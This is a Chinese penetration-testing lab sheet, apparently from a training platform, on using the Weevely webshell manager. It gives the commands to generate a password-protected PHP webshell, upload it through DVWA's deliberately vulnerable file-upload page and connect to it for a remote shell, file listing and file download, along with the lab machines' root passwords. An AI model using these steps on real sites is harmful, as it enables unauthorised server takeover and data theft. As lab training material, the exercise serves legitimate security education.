Weevely配置使用

实验目的

熟悉Webshell管理工具Weevely的配置使用。

实验环境

操作机：Kali2018-TS

（1）操作系统：Kali Linux 2018.4

（2）登录账号密码：操作系统账号root，密码Sangfor!7890

靶机：A-SQLi-Labs

（1）操作系统：CentOS 7

（2）安装的应用软件：Apache、MySQL(MariaDB)、PHP；DVWA、SQLi-Labs、Webug3.0漏洞网站环境

（3）登录账号密码：操作系统账号root，密码Sangfor!7890

实验原理

Weevely是一款Python编写的Webshell管理工具，它最大的优点在于跨平台，可以算作是Linux下的一款菜刀替代工具（限于PHP）。

实验步骤

1．启动Weevely

在操作机Kali2018-TS上点击桌面左上角菜单“Applications”->“10-Post Exploitation”->“weevely”，启动Weevely：

2．利用Weevely生成专用Webshell

在终端下输入以下命令，利用Weevely生成专用Webshell：

weevely generate 123456 /usr/muma.php

//说明：生成的Webshell文件名为muma.php，保存于/usr路径下，连接密码为123456

3．利用靶机的文件上传漏洞，将此Webshell上传至靶机

（1）在操作机Kali2018-TS上启动Firefox浏览器，在地址栏中输入以下URL访问靶机上的DVWA网站：

http://[靶机IP]/dvwa/

（注意大小写）

（2）成功登录DVWA网站后，在网站主页左侧菜单选择DVWA Security，将网站的安全级别设置为“Low”：

（3）在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡，将muma.php上传至靶机，并记下文件上传的路径：

4．利用Weevely远程连接Webshell，并获得靶机的控制权

（1）在Kali终端下输入以下命令，利用Weevely远程连接刚刚上传至靶机的muma.php：

weevely http://[靶机IP]/dvwa/hackable/uploads/muma.php 123456

连接成功后，直接输入回车即可获取靶机的shell：

（2）获取靶机的shell后，可以像操作本地主机一样，对靶机执行一些远程操作，如用file_ls查看文件和目录：

用system_info查看操作系统信息：

用file_download将远程目录下的文件下载到本地：

实验至此结束。

实验总结

本次实验，熟悉了Webshell管理工具Weevely的配置使用。